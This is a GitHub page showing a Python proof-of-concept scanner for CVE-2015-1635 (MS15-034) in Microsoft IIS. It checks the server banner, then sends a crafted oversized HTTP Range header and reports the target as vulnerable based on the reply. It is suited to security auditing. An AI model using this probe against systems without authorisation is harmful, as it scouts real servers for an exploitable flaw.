-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2015-1635-POC.py
91 lines (75 loc) · 2.52 KB
/
CVE-2015-1635-POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# coding:utf-8
# @Time : 2022/4/18
# @Author : w01ke
# @FileName: CVE-2015-1635-POC.py
import socket
import random
import sys
import getopt
def main(argv):
try:
options, args = getopt.getopt(argv, "hi:p:", ["help", "ip=", "port="])
except getopt.GetoptError:
print("Error: CVE-2015-1635-POC.py -i <ip> -p <port>")
sys.exit()
hexAllFfff = "18446744073709551615"
ipAddr = ""
port = ""
for option, value in options:
if option in ("-h", "--help"):
print(
'''
Usage: python3 CVE-2015-1635-POC.py [options]
Options:
-h, --help Show basic help message
-i, --ip Target IP or Domain(e,g. "wolke.cn")
-p, --port Target port
[+] example: python3 CVE-2015-1635-POC.py -i 10.0.0.1 -p 80
'''
)
sys.exit()
elif option in ("-i", "--ip"):
ipAddr = value
elif option in ("-p", "--port"):
port = value
req1 = "GET / HTTP/1.0\r\n\r\n"
req1 = req1.encode(encoding="utf-8")
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
req = req.encode(encoding="utf-8")
print("[*] Audit Started")
try:
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, int(port)))
client_socket.send(req1)
boringResp = str(client_socket.recv(1024), encoding="utf-8")
if "Microsoft" not in boringResp:
print("[*] Not IIS")
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, int(port)))
client_socket.send(req)
goodResp = str(client_socket.recv(1024), encoding="utf-8")
if "Requested Range Not Satisfiable" in goodResp:
print("[!!] Vulnerability MS15-034 existence!")
elif " The request has an invalid header name" in goodResp:
print("[*] Not Vulnerability.")
else:
print("[*] Unknown response state.")
except Exception as e:
print(e)
if __name__ == "__main__":
if len(sys.argv) > 1:
main(sys.argv[1:])
else:
print(
'''
Usage: python3 CVE-2015-1635-POC.py [options]
Options:
-h, --help Show basic help message
-i, --ip Target IP or Domain(e,g. "wolke.cn")
-p, --port Target port
[+] example: python3 CVE-2015-1635-POC.py -i 10.0.0.1 -p 80
'''
)
sys.exit()